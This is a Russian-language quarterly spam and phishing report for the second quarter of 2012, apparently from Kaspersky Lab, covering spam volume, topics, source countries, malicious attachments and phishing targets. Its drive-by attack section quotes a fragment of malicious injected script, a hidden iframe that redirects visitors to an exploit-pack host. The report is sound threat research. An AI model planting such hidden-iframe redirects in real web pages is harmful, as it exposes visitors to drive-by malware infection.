Отчеты по спаму и фишингу

Спам во втором квартале 2012

Цифры квартала

  • Доля спама составила в среднем 74,3% почтового трафика. Это на 2,3% меньше показателей первого квартала 2012.
  • Больше всего спама по-прежнему рассылается из Азии (53%) и Латинской Америки (14%).
  • Доля писем, содержавших вредоносные вложения, уменьшилась на 0,3% по сравнению с предыдущим кварталом и составила 3%.

 

Купоны vs спам: уменьшение доли спама

Во втором квартале 2012 года доля спама продолжала сокращаться и составила в среднем 74,3%, что на 2,3% меньше, чем в прошлом квартале.

Спам во втором квартале 2012

Доля спама в почтовом трафике, второй квартал 2012 г.

Наблюдаемое уменьшение доли спама в почтовых потоках – в какой-то мере явление сезонное. В летний период многие компьютеры, зараженные спам-ботами, выключены, поскольку их владельцы находятся в отпуске. С другой стороны, сокращение доли спама на фоне летнего уменьшения чистого почтового трафика может указывать на то, что мы имеем дело с общей, а не только с сезонной тенденцией.

Несколько лет назад в интернете появились новые сервисы – сайты групповых скидок, на которых пользователям предлагаются так называемые купоны. Купив купон, пользователь предъявляет его при покупке товара/услуги и получает скидку. Купонные сервисы быстро стали популярны во всем мире: многие компании стремятся с их помощью расширить клиентскую базу, а клиенты в свою очередь получают выгодные предложения.

Появление новой рекламной площадки, предложения которой распространяются в основном через электронную почту, не могло не отразиться на спаме.

В мусорной почте в западных странах, как известно, преобладает партнерский спам. При этом основную часть партнерских рассылок составляет реклама нелегальных товаров или сервисов. Однако в почтовом трафике существуют и партнерские рассылки с рекламой легального товара (например, сувенирной продукции или цветов), и спам-сообщения, не имеющие отношения к партнеркам.

Купонные сервисы двояко повлияли на западный спам: с одной стороны, само слово «купоны» стало использоваться спамерами для привлечения внимания к рассылкам, с другой – эти рекламные площадки оттянули на себя часть рекламы легальных товаров/услуг, распространявшейся в спаме. Это неудивительно, ведь купонные сервисы являются легальными рекламными площадками, и реклама, идущая через них, более эффективна, чем спам, так как не вызывает раздражения у пользователей, получающих рекламные предложения, не блокируется спам-фильтрами, а рассылки направляются целевой аудитории, заведомо заинтересованной в покупке. В результате оттока компаний, рекламировавших свои товары в спаме, численность спамерских рассылок в западном почтовом трафике несколько сократилась.

В странах, где купонные сервисы популярны, а доля заказного спама превышает долю партнерского, например в СНГ, купоны повлияли на спам еще больше. Многие фирмы, ранее использовавшие спам как основной инструмент рекламы, если не полностью переключились на купонные сервисы, то по крайней мере не пренебрегают этой легальной возможностью. Так можно предположить, что в России с заказов рекламы у спамеров на использование купонных сервисов практически полностью перешли туристические компании. По итогам второго квартала 2012 года доля писем рубрики «Отдых и путешествия» в Рунете, несмотря на сезон отпусков, составила лишь немногим более 1%. В то же время около 10% всех предложений российских купонных сервисов — это предложения от туристических фирм и экскурсионных бюро.

Возникновение все большего количества подобных проектов также стимулирует рекламодателей переключаться на этот вид рекламы: в жесткой конкурентной борьбе купонным сервисам приходится предлагать рекламодателям все более выгодные условия сотрудничества. С другой стороны, самим сервисам порой приходится прибегать к спаму для саморекламы, чтобы расширить свою аудиторию.

Уменьшение доли почтового мусора в трафике также может быть связано со складывающейся сложной экономической ситуацией в мире.

Спам и экономическая ситуация

Изменения в тематическом составе спама

Необычно малый процент рубрики «Отдых и путешествия» в русскоязычном спаме объясняется не только уходом рекламодателей на легальную рекламную площадку, что, безусловно, является положительной тенденцией в мире интернет-маркетинга, но и тревожными тенденциями в мировом экономическом развитии. Дело в том, что многие мелкие и средние турфирмы в России уже начали тонуть в новой волне экономического кризиса, что неминуемо приводит к снижению количества их рекламы, в том числе и в спаме.

Мы наблюдаем и другие признаки того, что экономический кризис тем или иным образом уже влияет на спам.Так в англоязычном спаме в мае начала увеличиваться доля сообщений тематики «Личные финансы». В последний весенний месяц эта рубрика составила 23,5% всего англоязычного спама, а уже в июне выросла более чем в три раза и достигла 73%. При этом бОльшую часть таких сообщений в июне составили письма с предложениями нелегального заработка. Похожая картина наблюдается и в спаме на немецком языке: в последние месяцы в нем становится все больше предложений подозрительной работы. Аналогичные изменения мы уже наблюдали во время кризиса 2008-2009 годов.

В русскоязычном спаме на фоне напряженной экономической ситуации в Европе в феврале 2012 года стала увеличиваться доля тематики «Недвижимость» (с 5,5% до 9,2%). Уже через месяц она составляла более 15% всего спама в Рунете, а в апреле — почти 20%.

Спам во втором квартале 2012

Динамика доли рекламы недвижимости в спаме, первое полугодие 2012 года

В последний раз неожиданный рост числа спам-писем тематики «Недвижимость» в Рунете мы наблюдали в 2008-2009 годах во время глобального финансового кризиса. В то время конъюктура рынка была несколько иной, чем сейчас, и доля такого спама увеличилась с 2-3% до 7-8%.

Серьезное увеличение процента этой рубрики на фоне уменьшения доли мусорной почты в почтовом трафике свидетельствует о значительном увеличении объема рекламы недвижимости в российском спаме. Для продажи большей частью предлагаются объекты в проблемных с экономической точки зрения странах, например в Испании. Это объясняется тем, что мелкие инвесторы стремятся продать недвижимость, цена на которую по всем прогнозам скоро упадет. Спам же в Рунете по-прежнему является самым дешевым способом рекламы для таких объектов.

Обратим внимание и на соотношение партнерского и заказного спама в Рунете.

Спам во втором квартале 2012

Соотношение партнерского и заказного спама в Рунете, второй квартал 2012 года

Доля заказного спама превысила к началу второго квартала 60%, а доля партнерского спама сократилась до 30%, после чего ситуация стабилизировалась, и оба показателя меняются незначительно. Саморекламу спамеры рассылают не слишком активно, что не в последнюю очередь связано с тем, что заказов у них достаточно.

Однако на это распределение в настоящий момент влияют сразу несколько факторов: во-первых, деловая активность в пору отпусков в сфере спам-бизнеса, как и во всякой другой, снижается, что является еще одной причиной низкого уровня саморекламы спамеров. Во-вторых, если исключить рубрику «Недвижимость» с ее необычно высоким процентом из заказного спама, то доля последнего составит порядка 44%. И хотя график выглядит типично для стабильной ситуации, реальная картина, как видим, иная.

Кроме того, доля заказного спама, даже с учетом «Недвижимости», значительно ниже аналогичного показателя второго квартала прошлого года (около 85%), в то время как доля партнерского спама, соответственно, практически вдвое выше.

Во втором квартале 2012 в спаме уже появились сообщения, эксплуатирующие тему кризиса и для привлечения внимания к вполне традиционным партнерским рассылкам, и для рекламы сомнительных дешевых кредитов. Кроме того мы фиксируем сообщения на английском и на русском языках, предлагающие участие в семинарах, основной темой которых является экономический кризис в целом или кризис Еврозоны в частности.

Спам во втором квартале 2012

Если экономическая ситуация в мире будет обостряться, вероятно, доля заказного спама в Рунете сократится. Ведь в этом случае многие мелкие и средние компании урежут свои расходы, и в первую очередь – расходы на рекламу. Если наше предположение верно, это приведет к дальнейшему уменьшению доли спама в почтовом трафике — ведь основной вклад с спам-трафик сейчас делает заказной спам. Мы полагаем, что при этом с завершением сезона отпусков значительно вырастет доля саморекламы спамеров. Вероятно, увеличится и доля партнерского спама, но ненамного. Дело в том, что пользователи Рунета не являются целевой аудиторией партнерских рассылок, – такой спам распространяется в СНГ лишь в расчете на случайных покупателей рекламируемых товаров/услуг.

Вредоносный спам

Если в условиях сложной экономической ситуации спам будет развиваться по сценарию 2008-2009 годов, мы имеем все основания опасаться увеличения доли мошеннического и вредоносного спама в ближайшие несколько месяцев. В свете этого обратим внимание на некоторые приемы злоумышленников, которые они использовали для рассылки вредоносного кода. Среди этих приемов и новые, и традиционные, но очень популярные у злоумышленников.

Спам для drive-by

Как известно, в спаме распространяются не только вредоносные программы в виде вложений, но и вредоносные ссылки. Даже просто пройдя по ссылке, пользователь может быть переадресован на страничку с наборами эксплойтов, совершенно не подозревая об этом, и компьютер будет заражен в результате так называемой drive-by атаки.

Во втором квартале 2012 года было очень много рассылок, используемых для инициации drive-by атак. Рассмотрим общую схему подобных атак на конкретных примерах:

    1. Пользователь получает сообщение имитирующее уведомление от популярного ресурса, официальное письмо из банка, информационную рассылку или письмо от знакомого, в котором его просят непременно пройти по ссылке. Часто в письмах присутствуют фразы, побуждающие пройти по ссылке как можно быстрее, к примеру, «as soon as possible» и «urgently».

Спам во втором квартале 2012

    1. Пройдя по ссылке, пользователь попадает на сайт со встроенным обфусцированным скриптом (в письме, приведенном на скриншоте, скрипт детектировался Антивирусом Касперского как Trojan.Script.Generic). Задача скрипта – с помощью тега iframe перенаправлять пользователя на вредоносный сайт.

Ниже приведен фрагмент исходного кода:

document.write (s) <iframe src=‘http://r*****d.su:8080/images/aublbzdni.php’ width=’10’ height=’10’ style=’visibility:hidden;position:absolute;left:0;top:0;’></iframe>

На странице видна лишь надпись «Loading…Please Wait…».

  1. В данном случае пользователь перенаправлялся на сайт с Phoenix exploit pack. В других случаях ссылки вели еще и на Blackhole exploit pack. После перехода на такие сайты компьютер пользователя начинают атаковать эксплойты, рассчитанные на уязвимости в Java, Flash Player или Adobe Reader. При удачном для злоумышленников стечении обстоятельств (то есть если пользователь использует уязвимую версию хотя бы одного из указанных приложений), на компьютер пользователя загружается исполняемый файл, который связывается с командным центром и в свою очередь загружает на компьютер различные вредоносные программы.

Вредоносное ПО на Wiki и Amazon

В апреле в спаме появились рассылки, имитирующие официальные сообщения Facebook. Основной особенностью этих сообщений было то, что ссылка, пройдя по которой, пользователь должен был быть переадресован на вредоносный или фишинговый сайт, вела не на недавно зарегистрированный домен или взломанный легитимный сайт, а на специально созданные странички на Wikipedia или Amazon. Однако все ссылки в полученных нами сообщениях не работали уже через несколько минут после обнаружения писем. Мы предполагали, что злоумышленники разместили вредоносные скрипты на созданных ими страницах Wikipedia, а также под видом рекламы секонд-хенд товаров на сайте Amazon.com, однако команды по разрешению инцидентов обоих сервисов среагировали быстро, и уже во время распространения спама ссылки были нерабочими.

Спам во втором квартале 2012

Зловреды — путешественники

Злоумышленники, распространяющие вредоносные письма, продолжают совершенствовать свои приемы социальной инженерии. Так, в течение квартала нами были зафиксированы рассылки, вкупе представляющие собой целый «туристический пакет», видимо, подготовленный спамерами специально к сезону отпусков.

Во-первых, речь идет о подделках под уведомления от авиакомпаний о возможности онлайн-регистрации на рейс, содержащих вредоносные ссылки. Если в прошлом квартале мы уже фиксировали такие рассылки якобы от US Airways, то в этом квартале появились аналогичные сообщения, имитирующие письма от British Airways.

Спам во втором квартале 2012

Помимо авиаперелетов, злоумышленники эскплуатировали тему бронирования отелей. Мы зафиксировали рассылку якобы от сайта booking.com. В письмах, предлагающих подтвердить бронирование номера, содержалось вредоносное вложение, детектируемое Антивирусом Касперского как Trojan-Spy.Win32.Zbot.

Спам во втором квартале 2012

Сообщение выглядит не слишком убедительно и кроме поля From ничем не похоже на оригинальное письмо от booking. Однако в летний период сайты бронирования отелей очень популярны, а пользователи, к сожалению, не всегда внимательны. Так что у этой, по всей видимости, на скорую руку созданной подделки жертв могло быть довольно много.

Помните, что крупные сервисы никогда не присылают подтверждение бронирования в zip-архивах. В случае сомнений в подлинности сообщения всегда можно связаться с компанией, выйдя на ее официальный сайт и воспользовавшись формой обратной связи, телефоном или электронной почтой, которые указаны на сайте.

Горячие темы в спаме

«Президентский» спам

Можно сказать, что во втором квартале наиболее популярной личностью у спамеров стал Барак Обама. Мы обнаружили множество писем с упоминанием американского президента. Интересно, что основную массу этих рассылок составляют сообщения, содержащие критику новых законопроектов, одобренных президентом. Письма были хорошо оформлены и содержали призывы поставить свою подпись против действий Обамы. Кроме того, в письмах содержалась просьба перечислить деньги на счета некоторых официальных американских организаций.

Спам во втором квартале 2012

В США политический и прочий некоммерческий спам не попадает под CAN-SPAM Act. То есть официальные организации действительно могли рассылать подобные сообщения.

Рассылки, попадающие под американский закон о спаме и эксплуатирующие имя Обамы, тоже встречались в спам-потоках. При анализе сообщений с рекламой нелегальной фармакологической продукции или реплик часов и с темой вроде «Обама пойман на горячем», поневоле вспоминаешь точно такие же письма почти четырехлетней давности. Тогда, после избрания Обамы президентом, его имя встречалось чуть ли не в каждой крупной спамерской рассылке, а заголовки нередко выглядели так: «Обама раскрыл свои секреты» или «Обама женщина!». Сейчас спамеры, кажется, извлекли свои старые шаблоны, желая воспользоваться новой волной интереса пользователей к Обаме, на этот раз вызванной приближением президентских выборов в США, в которых действующий президент снова выступит как кандидат.

Президентская гонка во Франции тоже оказала некоторое влияние на тематический состав спама. В почтовом трафике встречались, хотя и не столь многочисленные, спам-рассылки, посвященные кандидатамв президенты. В частности, во французских спам-потоках встречались письма с предложением приобрести футболки, агитирующие за Николя Саркози. Агитация заФрансуа Оланда, который в результате был выбран президентом, в спаме практически отсутствовала.

Тематическое мошенничество

Нигерийским спамерам с апреля не дает покоя нестабильная ситуация в Сирии. В нашем блоге мы уже писали о сообщениях якобы от жены Башара Асада. Сообщения с тем же текстом мы продолжали фиксировать на протяжении всего квартала. Но в чем нигерийским спамерам не откажешь, так это в фантазии, поэтому только одним шаблоном писем дело не ограничилось. В спаме встречаются как нигерийские письма как от «членов семьи и приближенных Асада», так и от рядовых граждан Сирии.

Спам во втором квартале 2012

Спамеры не обошли вниманием и Евро 2012. Начиная с зимы в спаме якобы от имени Лондонского Олимпийского комитета мошенники распространяют сообщения о выигрышах в «олимпийских» лотереях, причем чем ближе была Олимпиада, тем активнее шли рассылки.

География спама

Страны – источники спама

Во втором квартале 2012 география источников спама значительно изменилась по сравнению с первым кварталом. На первое место среди стран – источников спама неожиданно вышел Китай, откуда было отправлено около 19% всего спама. Кроме того, после длительного перерыва в тройку лидеров вернулись США, поделив с Индией второе место: из обеих стран было отправлено одинаковое количество спама – 11,7%.

Спам во втором квартале 2012

Распределение источников спама по странам, второй квартал 2012 года

В прошлом квартале мы писали про перераспределение ботнетов и возможное изменение географии спама. Однако столь резкой перемены мы не ожидали. Китай несколько лет назад уже был в лидерах спамерского рейтинга, но после принятия в 2006 году закона против спама, количество рассылаемой из этой страны мусорной почты резко сократилось. Прошло 6 лет, и спамеры, видимо, забыли об этом законе, так как он не применялся активно.

В целом возвращение в топ Китая и США логично: хороший интернет и огромное число пользователей, машины которых можно заразить спам-ботами и использовать для рассылки спама, привлекают спамеров.

Несмотря на перераспределение источников спама, основные тенденции не меняются: все больше спама идет из Азии и Латинской Америки. Так, в ТОP 20 во втором квартале вошли 9 стран азиатского региона, 5 – латиноамериканского, всего 1 страна Западной Европы (Великобритания) и 1 страна Восточной Европы (Россия).

В разные регионы спам приходит из разных стран. Так, в страны Западной Европы больше всего спама приходит из Китая (в другие регионы спама из Китая приходит существенно меньше, и только за счет рассылки спама в Западную Европу Китай вышел на первое место в общемировом рейтинге), в Восточную Европу – из Индии, в Северную Америку – из США.

Распределение источников спама по регионам

Спам во втором квартале 2012

Распределение источников спама по регионам, второй квартал 2012 года

Как видно на графике, большая часть спама в мире рассылается из стран Азиатского региона. Этот регион уже давно является лидером в рассылке спама, но в этом квартале доля рассылаемого из Азии спама заметно увеличилась. Произошло это, в частности, благодаря Китаю, занявшему в этом квартале первое место в рейтинге стран – источников спама.

Кроме того, выросла доля спама, рассылаемого с территории Северной Америки. Почти весь спам из этого региона рассылается из США. Относительно недавно США занимали 1-е место в нашем рейтинге. Но 2 года назад несколько командных центров крупных ботнетов были закрыты, и количество спама из этой страны существенно сократилось. Теперь спамеры вновь строят ботнеты в США, что следовало ожидать, ведь количество пользователей интернета в этой стране очень высоко, а значит, и велики размеры потенциального ботнета.

Спам во втором квартале 2012

Динамика распространения спама из регионов во втором квартале 2012

Что касается остальных регионов, то можно отметить дальнейшее сокращение спам-трафика из Европы, как Западной, так и Восточной. Латинская Америка по-прежнему остается на втором месте среди регионов – источников спама, хотя по сравнению с предыдущими кварталами доля спама, рассылаемого из этого региона, уменьшилась.

Вредоносные вложения в почте

Во втором квартале 2012 года средний процент писем, содержавших вредоносные вложения, уменьшился на 0,3 пункта по сравнению с предыдущим кварталом и составил 3%. Как видно на графике, в течение всего квартала колебание процента вредоносных вложений в электронной почте было незначительным. На графике ниже представлено распределение этого показателя по месяцам.

Спам во втором квартале 2012

Доля писем с вредоносными вложениями в почте

Напомним, что невысокая доля вредоносных вложений в почте не указывает на уменьшение доли вредоносных рассылок как таковых, ведь в почте распространяются не только зловреды в виде вложений, но и ссылки на зараженные веб-странички.

Распределение атак через почту по странам

Во втором квартале 2012 года распределение срабатывания нашего почтового антивируса по странам выглядело следующим образом:

Спам во втором квартале 2012

Распределение срабатываний почтового антивируса по странам, второй квартал 2012 года

В целом, в сравнении с предыдущим кварталом рейтинг стран по срабатываниям почтового антивируса остался практически неизменным: девять из десяти стран не покидали его на протяжении всего полугодия, лишь менялись местами. Доли атак на страны из ТОР 10 также изменились незначительно – для всех стран, кроме Гонконга, это изменение осталось в пределах 2%.

Гонконг, занимавший в первом квартале 2012 года вторую строчку рейтинга, во втором квартале выпал из ТОР 5, и доля детектирований почтового антивируса в этой стране составила 4,8% (-4%).

На первой строчке рейтинга вновь США, не уступавшие никому этой позиции ни разу за прошедшие шесть месяцев. По сравнению с прошлым кварталом доля детектирований почтового антивируса на территории этой страны увеличилась на 2%. Вторую и третью строчки заняли западноевропейские государства – Великобритания и Германия, прирост долей которых составил 2% и 1,4% соответственно.

Наиболее часто детектируемые в почте программы

Лидером среди наиболее часто детектируемых нашим почтовым антивирусом программ по итогам второго квартала 2012 года опять стал зловред Trojan-Spy.HTML.Fraud.gen. Доля детектов этой программы по сравнению с прошлым кварталом сократилась на 2% и составила 12,5%. Подробно об этой вредоносной программе можно почитать здесь. Мы лишь напомним, что этот зловред используется фишерами и представляет собой html-страничку, подделанную под регистрационную форму финансовой организации или какого-либо онлайн-сервиса. Регистрационные данные, введенные на такой страничке, отправляются злоумышленникам.

Спам во втором квартале 2012

TOP 10 вредоносных программ в почте во втором квартале 2012 г.

В TOP 10 по-прежнему много почтовых червей. Email-Worm.Win32.Mydoom.m сохранил свою позицию (2-е место). Как и его собрат Mydoom.l (9-е место), этот почтовый червь выполняет только две функции: сбор электронных адресов на зараженных машинах и рассылку по ним самого себя. Тем же функционалом обладает и занявший 5-е место Email-Worm.Win32.NetSky.q. Еще одни червь, Email-Worm.Win32.Bagle.gt (3-е место), в дополнение к уже обозначенному выше традиционному функционалу почтовых червей обращается к интернет-ресурсам для загрузки оттуда вредоносных программ.

На 6-м месте находится программа-упаковщик Packed.Win32.Katusha.o, занимавшая в июне вторую строчку рейтинга. Упаковщики этого семейства часто попадают в наш рейтинг. Они используются для обхода детектирования антивирусными средствами других вредоносных программ, чаще всего поддельных антивирусов.

Фишинг

По итогам второго квартала 2012 года атаки на пользователей социальных сетей составили более четверти всех попыток кражи пользовательских данных с использованием приемов фишинга.

Спам во втором квартале 2012

Распределение TOP 100 организаций, атакованных фишерами, по категориям
Срабатывание антифишинга, второй квартал 2012 года

Рейтинг категорий атакованных фишерами организаций основывается на срабатываниях компонента Антифишинг в наших продуктах на компьютерах пользователей. Антифишинг детектирует все фишинговые ссылки, по которым пытался пройти пользователь, — будь то ссылка в спамовом письме или в интернете. Подробную информацию о каждой категории можно получить здесь.

Категория «Социальные сети» опередила «Финансовые организации» по количеству проведенных на нее фишинговых атак. Рост доли атак на социальные сети обусловлен наступлением летних каникул. В этот период в Сеть выходит множество студентов и школьников, часто пользующихся такими сервисами. С другой стороны, эта аудитория редко имеет аккаунты в онлайн-банкинге, да и в целом летом финансовая активность снижается, что приводит к уменьшению доли спама, нацеленного на финансовые организации. Однако атаки на финансовые организации остаются самыми выгодными для злоумышленников, поэтому их процент, хотя и уменьшился, но остается на очень высоком уровне.

Рубрики спама в Рунете

Более четверти всего спама в Рунете – это реклама различных курсов и семинаров, которую мы относим к рубрике «Образование». Эта рубрика в течение трех лет является бессменным лидером нашего рейтинга. Ее доля продолжает увеличиваться на фоне уменьшения общего количества спама, а это значит, что количество писем этой тематики в Рунете остается на прежнем уровне.

Спам во втором квартале 2012

Тематическое распределение спама в Рунете, второй квартал 2012 г.

Доля рекламы недвижимости увеличилась на 6,5% по сравнению с первым кварталом. Благодаря такому впечатляющему росту тематика «Недвижимость» заняла вторую строчку в рейтинге тематик Рунета.

Выше мы уже обращали вниманиена рубрику «Отдых и путешествия», которая, несмотря на начало сезона отпусков, то есть самую горячую пору для туристического бизнеса, составляет немногим более 1% от всех спам-сообщений в Рунете. Даже по сравнению с первым кварталом, не самым удачным для таких рассылок, доля сообщений, предлагающих отдых и путешествия, сократилась более чем в два раза.

Заключение

Доля спама продолжает сокращаться. Это вызвано различными причинами, влияющими на спам-бизнес. В их числе и сезонные (в связи с порой отпусков многие машины, зараженные спам-ботами, отключены), и экономические (на спаме сказывается атмосфера тревоги, связанная с возможным экономическим кризисом), и конкурентные (некоторые рекламодатели уходят от спамеров и становятся клиентами купонных сервисов). По нашим прогнозам, в случае сохранения экономической ситуации в ее нынешнем состоянии или, тем более, в случае ее обострения, доля спама продолжит уменьшаться, в том числе и по завершению сезона отпусков. Мы не исключаем возможности постепенного снижения доли спама до отметки 65% в течение ближайшего года.

География источников спама сильно изменилась. Заинтересованные в хорошем интернете и большом количестве пользователей злоумышленники перебросили мощности своих ботнетов в Китай и США, откуда в настоящее время распространяется больше всего спама. Хотя мы прогнозировали изменения в распределении источников рассылки спама, мы не ожидали, что они будут столь скорыми. С другой стороны, сохранилась тенденция к увеличению доли спама, распространяемого из Азии и Латинской Америки.

Мы не случайно подробно остановились на некоторых приемах спамеров, распространяющих вредоносный код. Опыт наблюдения за спамом во время кризиса 2008 – 2009 года свидетельствует, что выраженный рост доли вредоносного кода в почте практически гарантирован. Таким образом, спам станет значительно опаснее. Особенно стоит подчеркнуть, что за последние годы арсенал злоумышленников сильно расширился и пополняется новыми приемами социальной инженерии чуть ли не каждый месяц.

Спам во втором квартале 2012

Ваш e-mail не будет опубликован. Обязательные поля помечены *

 

Отчеты

StripedFly: двуликий и незаметный

Разбираем фреймворк StripedFly для целевых атак, использовавший собственную версию эксплойта EternalBlue и успешно прикрывавшийся майнером.

Азиатские APT-группировки: тактики, техники и процедуры

Делимся с сообществом подходами, которые используют азиатские APT-группировки при взломе инфраструктуры, и подробной информацией о тактиках, техниках и процедурах (TTPs) злоумышленников, основанной на методологии MITRE ATT&CK.

Как поймать «Триангуляцию»

Эксперты «Лаборатории Касперского» смогли получить все этапы «Операции Триангуляция»: эксплойты нулевого дня для iOS, валидаторы, имплант TriangleDB и дополнительные модули.

Подпишитесь на еженедельную рассылку

Самая актуальная аналитика – в вашем почтовом ящике